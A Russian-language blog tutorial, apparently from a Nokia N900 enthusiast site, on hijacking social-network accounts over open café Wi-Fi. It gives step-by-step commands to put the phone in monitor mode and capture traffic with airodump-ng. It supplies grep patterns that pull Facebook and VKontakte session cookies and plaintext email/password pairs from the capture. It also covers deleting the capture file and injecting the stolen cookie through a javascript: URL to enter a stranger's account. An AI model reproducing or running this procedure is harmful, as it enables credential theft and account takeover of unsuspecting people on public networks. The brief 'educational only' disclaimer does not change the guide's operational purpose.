Здравствуйте, и с вами снова я Libert. Решил порадовать вас еще одной простецкой статьёй по взлому аудиту.

В данной статье речь пойдёт о всеми известной из данной темы http://maemos.ru/2010/06/08/aircrack-ng утилите, под названием Aircrack, а в частности её инструменту Airodump, так же для полного счастья нам понадобится браузер Опера или Феннек, т.к. МикроБ почему-то странно себя ведёт, ниже объясню почему. А еще нам не обойтись без утилиты под названием grep. Итак приступим!

Теория

Кто-нибудь из вас задумывался, а почему введя пароль 1 раз, вам не нужно вводить его на сайте снова? Бывает и полгода пройдёт, а вы на сайте? Этому феномену есть простое объяснение – кукки.

Cookies – небольшой кусочек данных, который каждый раз отправляется клиентом(вашим браузером) серверу. Что содержит этот кусочек? Да всё что угодно, пароли, формы, «корзину покупок» в интернет магазинах, «сравнение товаров» на яндекc маркете и т.д. и т.п. Каждый раз заходя на сайт в контакте, сервер спрашивает «кто ты?» и в ответ мы говорим примерно следующее, я «a5637cf34dd32a7b31b47c3887d539c4f99b3e737818e1b17b8da68d». И вот в этом букво-цифренном наборе и кроется ваш логин и пароль. Если этого кукки нет, сервер предлагает представиться с помощью форм «Логин» и «пароль».

Итак, разобравшись что такое кукки нужно разобраться, а как мы будем взламывать пароль? А никак, удивлены? Тут всё гораздо проще, мы просто украдём сессию.

Итак сессия – период работы клиента с сервером. Период может быть ограниченный по времени и не ограниченный, с условиями или без. То есть кукки может записаться на 15 или 30 минут, после чего будет недействителен или быть записанным только до выключения браузера (вспомнили галочку на почте и в контакте «Чужой компьютер?»).

Так вот мы и будем воровать эту сессию, но откуда? Воровать можно с открытых Wi-Fi сетей, чем мы и займёмся. Тут нам в помощь может придти кафешки типа кофехаус или старбокс или банально тот-же Макдоналдс, где есть бесплатный файфай.

Для того чтобы украсть куккис, нужно поймать его, для этого мы используем утилиту Airdump-ng. А чтобы из всего мусора, что придёт к нам на телефон по вайфаю поймать именно куккис используем программу grep.

Что такое греп? Поисковик, обычный жадный поисковик, который будет искать нужный нам куккис в куче мусора, что мы поймаем.

Практика

Для начала у кого нет-устанавливаем репозитории Extras-devel и Extras-testing. Если не знаете как, учитесь азам линукса и н900, данная статья еще рановата для вас.

После ставим grap и aircrack-ng:

Root

#Apt-get install aircrack-ng grep-gnu

(так же можно поставить и то и то через диспетчер приложений)

После начинаем взлом, для этого нам понадобится перевести телефон в режим монитора сетей wi-fi

#ifconfig wlan0 down

#iwconfig wlan0 mode Monitor

#ifconfig wlan0 up

Если на этом этапе всё проделано верно, у вас должны исчезнуть из списка сетей все Wi-Fi сети.

Далее начинаем смотреть airodump-ом есть ли в радиусе действия незапароленные сети

#airodump-ng wlan0

Останавливаем нажатием ctrl+с

Итак, мы видим одну единственную сеть, у которой в графе ENC стоит OPN что означает, что это открытая сеть, далее начинаем запись нужных нам файлов для последующего поиска кукисов.

#airodump-ng wlan0 –output-format pcap –w vzlom

Ключ –output-format позволяет нам записать именно нужные файлы в формате pcap, а ключ w отвечает за саму запись.

Далее не выключая airodamp набираем, а лучше заранее копируем на телефон конфиг для поиска grep-a

#tail -f vzlom-01.cap | cat | grep -aEo « c_user=[0-9]+|sid=[0-9]{1,5}|xs=[0-9a-f]{32} |email=[^&]+&pass=[^ ]+» для фейсбука

#tail -f vzlom-01.cap | cat | grep -aEo «remixsid=[0-9a-f]+|l=[0-9]{3,12}|p=[0-9a-f]{36}|email=[^&]+&pass=[^ ]+» для контакта

внимание, аирдамп прибавляет к названию «-01», а если запускать 2 раза «-02», а если 3 раза «-03» и т.д. смотрите внимательней.

И спустя некоторое время мы видим кукисы! Ура, перехватили товарисчи! Кукисом является всё после слова remixsid в случае с контактом.

Далее нам нужно почистить за собой весь мусор, набираем в консольке

#rm vzlom-01.cap (или 02,03 и т.п.)

#ifconfig wlan0 down

#iwconfig wlan0 mode manual

#ifconfig wlan0 up

Всё вайфай включён, мусор почищен, подключаемся к GPRS или к открытому вайфаю.

Но как нам подменить кукисы?

Тут на помощь приходит опера, поскольку МикроБ упорно отказывается перписывать кукис (в первый раз такое вижу), а просто добавляет повторное значение в конец (WTF?!!!) Но к счастью у нас есть опера и мозила. Я больше поклонник оперы, поэтому показываю на ее примере.

Заходим в контакт под своим логином и паролем, а после набираем в адресной строке следующее:

javascript:document.write(document.cookie);

И видим среди прочих строчек свой собственный куккис, но мы на этом не останавливаемся и вводим далее

javascript:document.cookie=” remixsid =значение отловленное grep”;

Ну и после снова вводим

javascript:document.write(document.cookie);

И видим вот такую картину

ну а после закрываем вкладу и заново заходим в контакт, всё, мы на чужом аккаунте!

Заключение

Как мы только что убедились-открытые вайфай сети-катастрофа. Отсутствие шифрования страницы входа в контакте-огромная тупость Дурова и администрации в общем. Ну и мы видим как легко взломать чужой контакт в таком случае. Чтобы вы не попадались на это, и вас не взламывали, пользуйтесь сервисами VPN. Что это такое-можете спросить у гула. И снова повторюсь, эта статья, ТОЛЬКО в ознакомительных целях, взлом кого-либо уголовно наказуем (ст. 272 УК РФ)

Так-же по теме:

Взлом Wi-Fi WEP шифрования http://maemos.ru/2010/06/08/aircrack-ng/

Взлом Windows XP SP3 с N900 http://maemos.ru/2010/08/09/metasploit/

В скором времени напишу как взламывать Wi-Fi WPA сети.

Всего наилучшего, Libert.

P.S. Тема для обсуждения на нашем форуме.